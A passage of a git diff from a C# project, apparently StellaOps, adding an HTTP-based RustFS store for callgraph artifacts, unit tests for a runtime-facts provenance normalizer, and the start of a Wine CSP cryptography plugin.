+using System.Net;
+using System.Net.Http;
+using System.Net.Http.Headers;
+using System.Text;
+using System.Threading;
+using System.Threading.Tasks;
+using Microsoft.Extensions.Logging;
+using Microsoft.Extensions.Options;
+using StellaOps.Signals.Options;
+using StellaOps.Signals.Storage.Models;
+
+namespace StellaOps.Signals.Storage;
+
+///
+/// Stores callgraph artifacts in RustFS (S3-compatible content-addressable storage).
+///
+internal sealed class RustFsCallgraphArtifactStore : ICallgraphArtifactStore
+{
+ internal const string HttpClientName = "signals-storage-rustfs";
+
+ private const string DefaultFileName = "callgraph.json";
+ private const string ManifestFileName = "manifest.json";
+ private const string ImmutableHeader = "X-RustFS-Immutable";
+ private const string RetainSecondsHeader = "X-RustFS-Retain-Seconds";
+ private static readonly MediaTypeHeaderValue OctetStream = new("application/octet-stream");
+
+ ///
+ /// Default retention for callgraph artifacts (90 days per CAS contract).
+ ///
+ private static readonly TimeSpan DefaultRetention = TimeSpan.FromDays(90);
+
+ private readonly IHttpClientFactory _httpClientFactory;
+ private readonly SignalsArtifactStorageOptions _storageOptions;
+ private readonly ILogger _logger;
+
+ public RustFsCallgraphArtifactStore(
+ IHttpClientFactory httpClientFactory,
+ IOptions<SignalsOptions> options,
+ ILogger<RustFsCallgraphArtifactStore> logger)
+ {
+ _httpClientFactory = httpClientFactory ?? throw new ArgumentNullException(nameof(httpClientFactory));
+ ArgumentNullException.ThrowIfNull(options);
+ _storageOptions = options.Value.Storage;
+ _logger = logger ?? throw new ArgumentNullException(nameof(logger));
+ }
+
+ public async Task<StoredCallgraphArtifact> SaveAsync(CallgraphArtifactSaveRequest request, Stream content, CancellationToken cancellationToken)
+ {
+ ArgumentNullException.ThrowIfNull(request);
+ ArgumentNullException.ThrowIfNull(content);
+
+ var hash = NormalizeHash(request.Hash);
+ if (string.IsNullOrWhiteSpace(hash))
+ {
+ throw new InvalidOperationException("Callgraph artifact hash is required for CAS storage.");
+ }
+
+ var fileName = SanitizeFileName(string.IsNullOrWhiteSpace(request.FileName) ? DefaultFileName : request.FileName);
+ var objectKey = BuildObjectKey(hash, fileName);
+
+ // Store the artifact
+ await PutObjectAsync(objectKey, content, request.ContentType, cancellationToken).ConfigureAwait(false);
+
+ // Store the manifest
+ var manifestKey = BuildObjectKey(hash, ManifestFileName);
+ if (request.ManifestContent != null)
+ {
+ request.ManifestContent.Position = 0;
+ await PutObjectAsync(manifestKey, request.ManifestContent, "application/json", cancellationToken).ConfigureAwait(false);
+ }
+ else
+ {
+ // Create empty manifest placeholder
+ using var emptyManifest = new MemoryStream(Encoding.UTF8.GetBytes("{}"));
+ await PutObjectAsync(manifestKey, emptyManifest, "application/json", cancellationToken).ConfigureAwait(false);
+ }
+
+ var artifactLength = content.CanSeek ? content.Length : 0;
+ _logger.LogInformation("Stored callgraph artifact {Hash}/{FileName} in RustFS bucket {Bucket}.",
+ hash, fileName, _storageOptions.BucketName);
+
+ return new StoredCallgraphArtifact(
+ objectKey,
+ artifactLength,
+ hash,
+ request.ContentType,
+ $"cas://reachability/graphs/{hash}",
+ manifestKey,
+ $"cas://reachability/graphs/{hash}/manifest");
+ }
+
+ public async Task<Stream?> GetAsync(string hash, string? fileName = null, CancellationToken cancellationToken = default)
+ {
+ var normalizedHash = NormalizeHash(hash);
+ if (string.IsNullOrWhiteSpace(normalizedHash))
+ {
+ return null;
+ }
+
+ var targetFileName = SanitizeFileName(string.IsNullOrWhiteSpace(fileName) ? DefaultFileName : fileName);
+ var objectKey = BuildObjectKey(normalizedHash, targetFileName);
+
+ var result = await GetObjectAsync(objectKey, cancellationToken).ConfigureAwait(false);
+ if (result is null)
+ {
+ _logger.LogDebug("Callgraph artifact {Hash}/{FileName} not found in RustFS.", normalizedHash, targetFileName);
+ }
+ else
+ {
+ _logger.LogDebug("Retrieved callgraph artifact {Hash}/{FileName} from RustFS.", normalizedHash, targetFileName);
+ }
+
+ return result;
+ }
+
+ public async Task<Stream?> GetManifestAsync(string hash, CancellationToken cancellationToken = default)
+ {
+ var normalizedHash = NormalizeHash(hash);
+ if (string.IsNullOrWhiteSpace(normalizedHash))
+ {
+ return null;
+ }
+
+ var manifestKey = BuildObjectKey(normalizedHash, ManifestFileName);
+ var result = await GetObjectAsync(manifestKey, cancellationToken).ConfigureAwait(false);
+
+ if (result is null)
+ {
+ _logger.LogDebug("Callgraph manifest for {Hash} not found in RustFS.", normalizedHash);
+ }
+ else
+ {
+ _logger.LogDebug("Retrieved callgraph manifest for {Hash} from RustFS.", normalizedHash);
+ }
+
+ return result;
+ }
+
+ public async Task<bool> ExistsAsync(string hash, CancellationToken cancellationToken = default)
+ {
+ var normalizedHash = NormalizeHash(hash);
+ if (string.IsNullOrWhiteSpace(normalizedHash))
+ {
+ return false;
+ }
+
+ var objectKey = BuildObjectKey(normalizedHash, DefaultFileName);
+ var exists = await HeadObjectAsync(objectKey, cancellationToken).ConfigureAwait(false);
+
+ _logger.LogDebug("Callgraph artifact {Hash} exists={Exists} in RustFS.", normalizedHash, exists);
+ return exists;
+ }
+
+ private string BuildObjectKey(string hash, string fileName)
+ {
+ var prefix = hash.Length >= 2 ? hash[..2] : hash;
+ var rootPrefix = string.IsNullOrWhiteSpace(_storageOptions.RootPrefix) ? "callgraphs" : _storageOptions.RootPrefix;
+ return $"{rootPrefix}/{prefix}/{hash}/{fileName}";
+ }
+
+ private async Task PutObjectAsync(string objectKey, Stream content, string? contentType, CancellationToken cancellationToken)
+ {
+ var client = _httpClientFactory.CreateClient(HttpClientName);
+ using var request = new HttpRequestMessage(HttpMethod.Put, BuildRequestUri(objectKey))
+ {
+ Content = CreateHttpContent(content)
+ };
+
+ request.Content.Headers.ContentType = string.IsNullOrWhiteSpace(contentType)
+ ? OctetStream
+ : new MediaTypeHeaderValue(contentType);
+
+ ApplyHeaders(request);
+
+ // Mark as immutable with 90-day retention per CAS contract
+ request.Headers.TryAddWithoutValidation(ImmutableHeader, "true");
+ var retainSeconds = Math.Ceiling(DefaultRetention.TotalSeconds);
+ request.Headers.TryAddWithoutValidation(RetainSecondsHeader, retainSeconds.ToString(CultureInfo.InvariantCulture));
+
+ using var response = await client.SendAsync(request, HttpCompletionOption.ResponseHeadersRead, cancellationToken).ConfigureAwait(false);
+ if (!response.IsSuccessStatusCode)
+ {
+ var error = await ReadErrorAsync(response, cancellationToken).ConfigureAwait(false);
+ throw new InvalidOperationException(
+ $"RustFS upload for {_storageOptions.BucketName}/{objectKey} failed with status {(int)response.StatusCode} ({response.ReasonPhrase}). {error}");
+ }
+
+ _logger.LogDebug("Uploaded callgraph object {Bucket}/{Key} via RustFS.", _storageOptions.BucketName, objectKey);
+ }
+
+ private async Task<Stream?> GetObjectAsync(string objectKey, CancellationToken cancellationToken)
+ {
+ var client = _httpClientFactory.CreateClient(HttpClientName);
+ using var request = new HttpRequestMessage(HttpMethod.Get, BuildRequestUri(objectKey));
+ ApplyHeaders(request);
+
+ using var response = await client.SendAsync(request, HttpCompletionOption.ResponseHeadersRead, cancellationToken).ConfigureAwait(false);
+ if (response.StatusCode == HttpStatusCode.NotFound)
+ {
+ return null;
+ }
+
+ if (!response.IsSuccessStatusCode)
+ {
+ var error = await ReadErrorAsync(response, cancellationToken).ConfigureAwait(false);
+ throw new InvalidOperationException(
+ $"RustFS download for {_storageOptions.BucketName}/{objectKey} failed with status {(int)response.StatusCode} ({response.ReasonPhrase}). {error}");
+ }
+
+ var buffer = new MemoryStream();
+ if (response.Content is not null)
+ {
+ await response.Content.CopyToAsync(buffer, cancellationToken).ConfigureAwait(false);
+ }
+
+ buffer.Position = 0;
+ return buffer;
+ }
+
+ private async Task<bool> HeadObjectAsync(string objectKey, CancellationToken cancellationToken)
+ {
+ var client = _httpClientFactory.CreateClient(HttpClientName);
+ using var request = new HttpRequestMessage(HttpMethod.Head, BuildRequestUri(objectKey));
+ ApplyHeaders(request);
+
+ using var response = await client.SendAsync(request, HttpCompletionOption.ResponseHeadersRead, cancellationToken).ConfigureAwait(false);
+ return response.StatusCode == HttpStatusCode.OK;
+ }
+
+ private Uri BuildRequestUri(string objectKey)
+ {
+ if (!Uri.TryCreate(_storageOptions.RustFs.BaseUrl, UriKind.Absolute, out var baseUri))
+ {
+ throw new InvalidOperationException("RustFS baseUrl is invalid.");
+ }
+
+ var encodedBucket = Uri.EscapeDataString(_storageOptions.BucketName);
+ var encodedKey = EncodeKey(objectKey);
+ var relativePath = new StringBuilder()
+ .Append("buckets/")
+ .Append(encodedBucket)
+ .Append("/objects/")
+ .Append(encodedKey)
+ .ToString();
+
+ return new Uri(baseUri, relativePath);
+ }
+
+ private static string EncodeKey(string key)
+ {
+ if (string.IsNullOrWhiteSpace(key))
+ {
+ return string.Empty;
+ }
+
+ var segments = key.Split('/', StringSplitOptions.RemoveEmptyEntries | StringSplitOptions.TrimEntries);
+ return string.Join('/', segments.Select(Uri.EscapeDataString));
+ }
+
+ private void ApplyHeaders(HttpRequestMessage request)
+ {
+ var rustFsOptions = _storageOptions.RustFs;
+ if (!string.IsNullOrWhiteSpace(rustFsOptions.ApiKeyHeader) && !string.IsNullOrWhiteSpace(rustFsOptions.ApiKey))
+ {
+ request.Headers.TryAddWithoutValidation(rustFsOptions.ApiKeyHeader, rustFsOptions.ApiKey);
+ }
+
+ foreach (var header in _storageOptions.Headers)
+ {
+ request.Headers.TryAddWithoutValidation(header.Key, header.Value);
+ }
+ }
+
+ private static HttpContent CreateHttpContent(Stream content)
+ {
+ if (content is MemoryStream memoryStream)
+ {
+ if (memoryStream.TryGetBuffer(out var segment))
+ {
+ return new ByteArrayContent(segment.Array!, segment.Offset, segment.Count);
+ }
+
+ return new ByteArrayContent(memoryStream.ToArray());
+ }
+
+ if (content.CanSeek)
+ {
+ var originalPosition = content.Position;
+ try
+ {
+ content.Position = 0;
+ using var duplicate = new MemoryStream();
+ content.CopyTo(duplicate);
+ return new ByteArrayContent(duplicate.ToArray());
+ }
+ finally
+ {
+ content.Position = originalPosition;
+ }
+ }
+
+ using var buffer = new MemoryStream();
+ content.CopyTo(buffer);
+ return new ByteArrayContent(buffer.ToArray());
+ }
+
+ private static async Task<string> ReadErrorAsync(HttpResponseMessage response, CancellationToken cancellationToken)
+ {
+ if (response.Content is null)
+ {
+ return string.Empty;
+ }
+
+ var text = await response.Content.ReadAsStringAsync(cancellationToken).ConfigureAwait(false);
+ if (string.IsNullOrWhiteSpace(text))
+ {
+ return string.Empty;
+ }
+
+ var trimmed = text.Trim();
+ return trimmed.Length <= 512 ? trimmed : trimmed[..512];
+ }
+
+ private static string? NormalizeHash(string? hash)
+ => hash?.Trim().ToLowerInvariant();
+
+ private static string SanitizeFileName(string value)
+ => string.Join('_', value.Split(Path.GetInvalidFileNameChars(), StringSplitOptions.RemoveEmptyEntries | StringSplitOptions.TrimEntries)).ToLowerInvariant();
+}
diff --git a/src/Signals/__Tests/StellaOps.Signals.Tests/RuntimeFactsIngestionServiceTests.cs b/src/Signals/__Tests/StellaOps.Signals.Tests/RuntimeFactsIngestionServiceTests.cs
index 96677f197..f259527af 100644
--- a/src/Signals/__Tests/StellaOps.Signals.Tests/RuntimeFactsIngestionServiceTests.cs
+++ b/src/Signals/__Tests/StellaOps.Signals.Tests/RuntimeFactsIngestionServiceTests.cs
@@ -17,12 +17,14 @@ public class RuntimeFactsIngestionServiceTests
var scoringService = new RecordingScoringService();
var cache = new InMemoryReachabilityCache();
var eventsPublisher = new RecordingEventsPublisher();
+ var provenanceNormalizer = new RuntimeFactsProvenanceNormalizer();
var service = new RuntimeFactsIngestionService(
factRepository,
TimeProvider.System,
cache,
eventsPublisher,
scoringService,
+ provenanceNormalizer,
NullLogger.Instance);
var request = new RuntimeFactsIngestRequest
@@ -61,6 +63,21 @@ public class RuntimeFactsIngestionServiceTests
Assert.Equal("runtime", persisted.Metadata?["provenance.source"]);
Assert.Equal("cg-123", persisted.Metadata?["provenance.callgraphId"]);
Assert.NotNull(persisted.Metadata?["provenance.ingestedAt"]);
+
+ // Verify context_facts with AOC provenance (SIGNALS-24-003)
+ Assert.NotNull(persisted.ContextFacts);
+ Assert.NotNull(persisted.ContextFacts.Provenance);
+ Assert.Equal(1, persisted.ContextFacts.Provenance.SchemaVersion);
+ Assert.Equal(ProvenanceFeedType.RuntimeFacts, persisted.ContextFacts.Provenance.FeedType);
+ Assert.Equal(3, persisted.ContextFacts.RecordCount); // Three events (provenance tracks each observation)
+ Assert.NotEmpty(persisted.ContextFacts.Provenance.Records);
+ Assert.All(persisted.ContextFacts.Provenance.Records, record =>
+ {
+ Assert.NotEmpty(record.RecordId);
+ Assert.NotEmpty(record.RecordType);
+ Assert.NotNull(record.Subject);
+ Assert.NotNull(record.Facts);
+ });
}
private sealed class InMemoryReachabilityFactRepository : IReachabilityFactRepository
diff --git a/src/Signals/__Tests/StellaOps.Signals.Tests/RuntimeFactsProvenanceNormalizerTests.cs b/src/Signals/__Tests/StellaOps.Signals.Tests/RuntimeFactsProvenanceNormalizerTests.cs
new file mode 100644
index 000000000..3c7106071
--- /dev/null
+++ b/src/Signals/__Tests/StellaOps.Signals.Tests/RuntimeFactsProvenanceNormalizerTests.cs
@@ -0,0 +1,400 @@
+using System;
+using System.Collections.Generic;
+using System.Linq;
+using StellaOps.Signals.Models;
+using StellaOps.Signals.Services;
+using Xunit;
+
+namespace StellaOps.Signals.Tests;
+
+public class RuntimeFactsProvenanceNormalizerTests
+{
+    private readonly RuntimeFactsProvenanceNormalizer _normalizer = new();
+
+    [Fact]
+    public void NormalizeToFeed_CreatesValidProvenanceFeed()
+    {
+        var events = new List<RuntimeFactEvent>
+        {
+            new() { SymbolId = "svc.foo", HitCount = 5 },
+            new() { SymbolId = "svc.bar", HitCount = 3 }
+        };
+        var subject = new ReachabilitySubject { Component = "web", Version = "1.0.0" };
+        var timestamp = DateTimeOffset.Parse("2025-12-07T10:00:00Z");
+
+        var feed = _normalizer.NormalizeToFeed(events, subject, "cg-123", null, timestamp);
+
+        Assert.Equal(1, feed.SchemaVersion);
+        Assert.Equal(ProvenanceFeedType.RuntimeFacts, feed.FeedType);
+        Assert.NotEmpty(feed.FeedId);
+        Assert.Equal(timestamp, feed.GeneratedAt);
+        Assert.Equal("signals-runtime-ingestion", feed.SourceService);
+        Assert.Equal("cg-123", feed.CorrelationId);
+        Assert.Equal(2, feed.Records.Count);
+    }
+
+    [Fact]
+    public void NormalizeToFeed_PopulatesAocMetadata()
+    {
+        var events = new List<RuntimeFactEvent>
+        {
+            new() { SymbolId = "svc.foo", HitCount = 1 }
+        };
+        var subject = new ReachabilitySubject { Component = "web", Version = "1.0.0" };
+        var requestMetadata = new Dictionary<string, string> { ["source"] = "ebpf-agent" };
+
+        var feed = _normalizer.NormalizeToFeed(events, subject, "cg-456", requestMetadata, DateTimeOffset.UtcNow);
+
+        Assert.NotNull(feed.Metadata);
+        Assert.Equal("1", feed.Metadata["aoc.version"]);
+        Assert.Equal("SGSI0101", feed.Metadata["aoc.contract"]);
+        Assert.Equal("cg-456", feed.Metadata["callgraphId"]);
+        Assert.Equal("web|1.0.0", feed.Metadata["subjectKey"]);
+        Assert.Equal("ebpf-agent", feed.Metadata["request.source"]);
+    }
+
+    [Fact]
+    public void NormalizeToFeed_SetsRecordTypeBasedOnProcessMetadata()
+    {
+        var evt = new RuntimeFactEvent
+        {
+            SymbolId = "svc.foo",
+            ProcessName = "python3",
+            ProcessId = 12345,
+            HitCount = 1
+        };
+        var subject = new ReachabilitySubject { Component = "api", Version = "2.0.0" };
+
+        var feed = _normalizer.NormalizeToFeed(new[] { evt }, subject, "cg-test", null, DateTimeOffset.UtcNow);
+
+        Assert.Single(feed.Records);
+        Assert.Equal("runtime.process.observed", feed.Records[0].RecordType);
+        Assert.Equal(ProvenanceSubjectType.Process, feed.Records[0].Subject.Type);
+    }
+
+    [Fact]
+    public void NormalizeToFeed_SetsRecordTypeForNetworkConnection()
+    {
+        var evt = new RuntimeFactEvent
+        {
+            SymbolId = "net.connect",
+            SocketAddress = "10.0.0.1:8080",
+            HitCount = 1
+        };
+        var subject = new ReachabilitySubject { Component = "gateway", Version = "1.0.0" };
+
+        var feed = _normalizer.NormalizeToFeed(new[] { evt }, subject, "cg-net", null, DateTimeOffset.UtcNow);
+
+        Assert.Single(feed.Records);
+        Assert.Equal("runtime.network.connection", feed.Records[0].RecordType);
+    }
+
+    [Fact]
+    public void NormalizeToFeed_SetsRecordTypeForContainerActivity()
+    {
+        var evt = new RuntimeFactEvent
+        {
+            SymbolId = "container.exec",
+            ContainerId = "abc123def456",
+            HitCount = 1
+        };
+        var subject = new ReachabilitySubject { ImageDigest = "sha256:deadbeef" };
+
+        var feed = _normalizer.NormalizeToFeed(new[] { evt }, subject, "cg-container", null, DateTimeOffset.UtcNow);
+
+        Assert.Single(feed.Records);
+        Assert.Equal("runtime.container.activity", feed.Records[0].RecordType);
+        Assert.Equal(ProvenanceSubjectType.Container, feed.Records[0].Subject.Type);
+    }
+
+    [Fact]
+    public void NormalizeToFeed_SetsRecordTypeForPackageLoaded()
+    {
+        var evt = new RuntimeFactEvent
+        {
+            SymbolId = "pkg.load",
+            Purl = "pkg:npm/lodash@4.17.21",
+            HitCount = 1
+        };
+        var subject = new ReachabilitySubject { Component = "webapp", Version = "1.0.0" };
+
+        var feed = _normalizer.NormalizeToFeed(new[] { evt }, subject, "cg-pkg", null, DateTimeOffset.UtcNow);
+
+        Assert.Single(feed.Records);
+        Assert.Equal("runtime.package.loaded", feed.Records[0].RecordType);
+        Assert.Equal(ProvenanceSubjectType.Package, feed.Records[0].Subject.Type);
+        Assert.Equal("pkg:npm/lodash@4.17.21", feed.Records[0].Subject.Identifier);
+    }
+
+    [Fact]
+    public void NormalizeToFeed_PopulatesRuntimeProvenanceFacts()
+    {
+        var evt = new RuntimeFactEvent
+        {
+            SymbolId = "svc.handler",
+            ProcessName = "java",
+            ProcessId = 9999,
+            SocketAddress = "localhost:3306",
+            ContainerId = "k8s_pod_abc",
+            HitCount = 42,
+            Purl = "pkg:maven/com.example/lib@1.0.0",
+            CodeId = "code-123",
+            BuildId = "build-456",
+            LoaderBase = "/usr/lib/jvm",
+            Metadata = new Dictionary<string, string> { ["env"] = "prod" }
+        };
+        var subject = new ReachabilitySubject { Component = "svc", Version = "3.0.0" };
+
+        var feed = _normalizer.NormalizeToFeed(new[] { evt }, subject, "cg-full", null, DateTimeOffset.UtcNow);
+
+        Assert.Single(feed.Records);
+        var facts = feed.Records[0].Facts;
+        Assert.NotNull(facts);
+        Assert.Equal("svc.handler", facts.SymbolId);
+        Assert.Equal("java", facts.ProcessName);
+        Assert.Equal(9999, facts.ProcessId);
+        Assert.Equal("localhost:3306", facts.SocketAddress);
+        Assert.Equal("k8s_pod_abc", facts.ContainerId);
+        Assert.Equal(42, facts.HitCount);
+        Assert.Equal("pkg:maven/com.example/lib@1.0.0", facts.Purl);
+        Assert.Equal("code-123", facts.CodeId);
+        Assert.Equal("build-456", facts.BuildId);
+        Assert.Equal("/usr/lib/jvm", facts.LoaderBase);
+        Assert.NotNull(facts.Metadata);
+        Assert.Equal("prod", facts.Metadata["env"]);
+    }
+
+    [Fact]
+    public void NormalizeToFeed_SetsConfidenceBasedOnEvidence()
+    {
+        var evtWithFullEvidence = new RuntimeFactEvent
+        {
+            SymbolId = "svc.full",
+            ProcessName = "node",
+            ProcessId = 1234,
+            SymbolDigest = "sha256:abcdef1234567890abcdef1234567890abcdef1234567890abcdef1234567890",
+            EvidenceUri = "s3://bucket/evidence.json",
+            HitCount = 1
+        };
+        var evtMinimal = new RuntimeFactEvent
+        {
+            SymbolId = "svc.minimal",
+            HitCount = 1
+        };
+        var subject = new ReachabilitySubject { Component = "app", Version = "1.0.0" };
+
+        var feed = _normalizer.NormalizeToFeed(new[] { evtWithFullEvidence, evtMinimal }, subject, "cg-conf", null, DateTimeOffset.UtcNow);
+
+        Assert.Equal(2, feed.Records.Count);
+        var fullRecord = feed.Records.First(r => r.Facts?.SymbolId == "svc.full");
+        var minimalRecord = feed.Records.First(r => r.Facts?.SymbolId == "svc.minimal");
+
+        Assert.True(fullRecord.Confidence > minimalRecord.Confidence);
+        Assert.True(fullRecord.Confidence >= 0.95);
+        Assert.True(minimalRecord.Confidence >= 0.95);
+    }
+
+    [Fact]
+    public void NormalizeToFeed_BuildsEvidenceWithCaptureMethod()
+    {
+        var evt = new RuntimeFactEvent
+        {
+            SymbolId = "svc.traced",
+            SymbolDigest = "abc123",
+            EvidenceUri = "s3://evidence/trace.json",
+            ProcessId = 5678,
+            HitCount = 1,
+            Metadata = new Dictionary<string, string> { ["captureMethod"] = "eBPF" }
+        };
+        var subject = new ReachabilitySubject { Component = "traced", Version = "1.0.0" };
+
+        var feed = _normalizer.NormalizeToFeed(new[] { evt }, subject, "cg-evidence", null, DateTimeOffset.UtcNow);
+
+        Assert.Single(feed.Records);
+        var evidence = feed.Records[0].Evidence;
+        Assert.NotNull(evidence);
+        Assert.Equal(EvidenceCaptureMethod.EBpf, evidence.CaptureMethod);
+        Assert.Equal("s3://evidence/trace.json", evidence.RawDataRef);
+    }
+
+    [Fact]
+    public void NormalizeToFeed_NormalizesDigestWithSha256Prefix()
+    {
+        var evt = new RuntimeFactEvent
+        {
+            SymbolId = "svc.digested",
+            SymbolDigest = "abcdef1234567890abcdef1234567890abcdef1234567890abcdef1234567890",
+            HitCount = 1
+        };
+        var subject = new ReachabilitySubject { Component = "app", Version = "1.0.0" };
+
+        var feed = _normalizer.NormalizeToFeed(new[] { evt }, subject, "cg-digest", null, DateTimeOffset.UtcNow);
+
+        Assert.Single(feed.Records);
+        var evidence = feed.Records[0].Evidence;
+        Assert.NotNull(evidence);
+        Assert.StartsWith("sha256:", evidence.SourceDigest);
+    }
+
+    [Fact]
+    public void NormalizeToFeed_SkipsEventsWithEmptySymbolId()
+    {
+        var events = new List<RuntimeFactEvent>
+        {
+            new() { SymbolId = "valid.symbol", HitCount = 1 },
+            new() { SymbolId = "", HitCount = 1 },
+            new() { SymbolId = "   ", HitCount = 1 },
+            new() { SymbolId = null!, HitCount = 1 }
+        };
+        var subject = new ReachabilitySubject { Component = "app", Version = "1.0.0" };
+
+        var feed = _normalizer.NormalizeToFeed(events, subject, "cg-filter", null, DateTimeOffset.UtcNow);
+
+        Assert.Single(feed.Records);
+        Assert.Equal("valid.symbol", feed.Records[0].Facts?.SymbolId);
+    }
+
+    [Fact]
+    public void CreateContextFacts_ReturnsPopulatedContextFacts()
+    {
+        var events = new List<RuntimeFactEvent>
+        {
+            new() { SymbolId = "svc.a", HitCount = 1 },
+            new() { SymbolId = "svc.b", HitCount = 2 },
+            new() { SymbolId = "svc.c", HitCount = 3 }
+        };
+        var subject = new ReachabilitySubject { Component = "svc", Version = "1.0.0" };
+        var timestamp = DateTimeOffset.Parse("2025-12-07T12:00:00Z");
+
+        var contextFacts = _normalizer.CreateContextFacts(events, subject, "cg-ctx", null, timestamp);
+
+        Assert.NotNull(contextFacts);
+        Assert.NotNull(contextFacts.Provenance);
+        Assert.Equal(timestamp, contextFacts.LastUpdatedAt);
+        Assert.Equal(3, contextFacts.RecordCount);
+        Assert.Equal(3, contextFacts.Provenance.Records.Count);
+    }
+
+    [Fact]
+    public void NormalizeToFeed_DeterminesObserverFromContainerContext()
+    {
+        var evt = new RuntimeFactEvent
+        {
+            SymbolId = "container.runtime",
+            ContainerId = "docker_abc123",
+            HitCount = 1
+        };
+        var subject = new ReachabilitySubject { ImageDigest = "sha256:test" };
+
+        var feed = _normalizer.NormalizeToFeed(new[] { evt }, subject, "cg-observer", null, DateTimeOffset.UtcNow);
+
+        Assert.Single(feed.Records);
+        Assert.Equal("container-runtime-agent", feed.Records[0].ObservedBy);
+    }
+
+    [Fact]
+    public void NormalizeToFeed_DeterminesObserverFromProcessContext()
+    {
+        var evt = new RuntimeFactEvent
+        {
+            SymbolId = "process.runtime",
+            ProcessId = 12345,
+            HitCount = 1
+        };
+        var subject = new ReachabilitySubject { Component = "app", Version = "1.0.0" };
+
+        var feed = _normalizer.NormalizeToFeed(new[] { evt }, subject, "cg-proc", null, DateTimeOffset.UtcNow);
+
+        Assert.Single(feed.Records);
+        Assert.Equal("process-monitor-agent", feed.Records[0].ObservedBy);
+    }
+
+    [Fact]
+    public void NormalizeToFeed_UsesObservedAtFromEvent()
+    {
+        var observedTime = DateTimeOffset.Parse("2025-12-06T08:00:00Z");
+        var generatedTime = DateTimeOffset.Parse("2025-12-07T10:00:00Z");
+        var evt = new RuntimeFactEvent
+        {
+            SymbolId = "svc.timed",
+            ObservedAt = observedTime,
+            HitCount = 1
+        };
+        var subject = new ReachabilitySubject { Component = "timed", Version = "1.0.0" };
+
+        var feed = _normalizer.NormalizeToFeed(new[] { evt }, subject, "cg-time", null, generatedTime);
+
+        Assert.Single(feed.Records);
+        Assert.Equal(observedTime, feed.Records[0].OccurredAt);
+    }
+
+    [Fact]
+    public void NormalizeToFeed_FallsBackToGeneratedAtWhenNoObservedAt()
+    {
+        var generatedTime = DateTimeOffset.Parse("2025-12-07T10:00:00Z");
+        var evt = new RuntimeFactEvent
+        {
+            SymbolId = "svc.notime",
+            HitCount = 1
+        };
+        var subject = new ReachabilitySubject { Component = "notime", Version = "1.0.0" };
+
+        var feed = _normalizer.NormalizeToFeed(new[] { evt }, subject, "cg-notime", null, generatedTime);
+
+        Assert.Single(feed.Records);
+        Assert.Equal(generatedTime, feed.Records[0].OccurredAt);
+    }
+
+    [Fact]
+    public void NormalizeToFeed_BuildsSubjectIdentifierFromPurl()
+    {
+        var evt = new RuntimeFactEvent
+        {
+            SymbolId = "lib.call",
+            Purl = "pkg:npm/express@4.18.0",
+            HitCount = 1
+        };
+        var subject = new ReachabilitySubject { Component = "webapp", Version = "1.0.0" };
+
+        var feed = _normalizer.NormalizeToFeed(new[] { evt }, subject, "cg-purl", null, DateTimeOffset.UtcNow);
+
+        Assert.Single(feed.Records);
+        Assert.Equal("pkg:npm/express@4.18.0", feed.Records[0].Subject.Identifier);
+    }
+
+    [Fact]
+    public void NormalizeToFeed_BuildsSubjectIdentifierFromComponent()
+    {
+        var evt = new RuntimeFactEvent
+        {
+            SymbolId = "svc.call",
+            HitCount = 1
+        };
+        var subject = new ReachabilitySubject { Component = "my-service", Version = "2.0.0" };
+
+        var feed = _normalizer.NormalizeToFeed(new[] { evt }, subject, "cg-comp", null, DateTimeOffset.UtcNow);
+
+        Assert.Single(feed.Records);
+        Assert.Equal("my-service@2.0.0", feed.Records[0].Subject.Identifier);
+    }
+
+    [Fact]
+    public void NormalizeToFeed_UsesImageDigestAsSubjectForContainers()
+    {
+        var evt = new RuntimeFactEvent
+        {
+            SymbolId = "container.exec",
+            HitCount = 1
+        };
+        var subject = new ReachabilitySubject
+        {
+            ImageDigest = "sha256:abc123def456"
+        };
+
+        var feed = _normalizer.NormalizeToFeed(new[] { evt }, subject, "cg-image", null, DateTimeOffset.UtcNow);
+
+        Assert.Single(feed.Records);
+        Assert.Equal(ProvenanceSubjectType.Image, feed.Records[0].Subject.Type);
+        Assert.Equal("sha256:abc123def456", feed.Records[0].Subject.Identifier);
+    }
+}
diff --git a/src/__Libraries/StellaOps.Cryptography.Plugin.WineCsp/StellaOps.Cryptography.Plugin.WineCsp.csproj b/src/__Libraries/StellaOps.Cryptography.Plugin.WineCsp/StellaOps.Cryptography.Plugin.WineCsp.csproj
new file mode 100644
index 000000000..0a0dd4796
--- /dev/null
+++ b/src/__Libraries/StellaOps.Cryptography.Plugin.WineCsp/StellaOps.Cryptography.Plugin.WineCsp.csproj
@@ -0,0 +1,26 @@
+<Project Sdk="Microsoft.NET.Sdk">
+
+  <PropertyGroup>
+    <TargetFramework>net10.0</TargetFramework>
+    <Nullable>enable</Nullable>
+    <ImplicitUsings>enable</ImplicitUsings>
+  </PropertyGroup>
+
+  <PropertyGroup>
+    <AssemblyName>StellaOps.Cryptography.Plugin.WineCsp</AssemblyName>
+    <RootNamespace>StellaOps.Cryptography.Plugin.WineCsp</RootNamespace>
+  </PropertyGroup>
+
+  <!-- NOTE(review): XML was stripped in transit; package/project references below reconstructed from code usage - confirm against the original commit. -->
+  <ItemGroup>
+    <PackageReference Include="Microsoft.Extensions.Http" />
+    <PackageReference Include="Microsoft.Extensions.Options" />
+    <PackageReference Include="Polly" />
+    <PackageReference Include="Polly.Extensions.Http" />
+  </ItemGroup>
+
+  <ItemGroup>
+    <ProjectReference Include="..\StellaOps.Cryptography\StellaOps.Cryptography.csproj" />
+  </ItemGroup>
+
+</Project>
diff --git a/src/__Libraries/StellaOps.Cryptography.Plugin.WineCsp/WineCspCryptoServiceCollectionExtensions.cs b/src/__Libraries/StellaOps.Cryptography.Plugin.WineCsp/WineCspCryptoServiceCollectionExtensions.cs
new file mode 100644
index 000000000..9ff207b6c
--- /dev/null
+++ b/src/__Libraries/StellaOps.Cryptography.Plugin.WineCsp/WineCspCryptoServiceCollectionExtensions.cs
@@ -0,0 +1,90 @@
+using Microsoft.Extensions.DependencyInjection;
+using Microsoft.Extensions.DependencyInjection.Extensions;
+using Microsoft.Extensions.Options;
+using Polly;
+using Polly.Extensions.Http;
+
+namespace StellaOps.Cryptography.Plugin.WineCsp;
+
+/// <summary>
+/// Extension methods for registering the Wine CSP HTTP provider.
+/// </summary>
+public static class WineCspCryptoServiceCollectionExtensions
+{
+    /// <summary>
+    /// Registers the Wine CSP HTTP provider for GOST operations via Wine-hosted CryptoPro CSP.
+    /// </summary>
+    /// <param name="services">Service collection.</param>
+    /// <param name="configureOptions">Optional options configuration.</param>
+    /// <returns>Service collection for chaining.</returns>
+    public static IServiceCollection AddWineCspProvider(
+        this IServiceCollection services,
+        Action<WineCspProviderOptions>? configureOptions = null)
+    {
+        // Configure options
+        if (configureOptions != null)
+        {
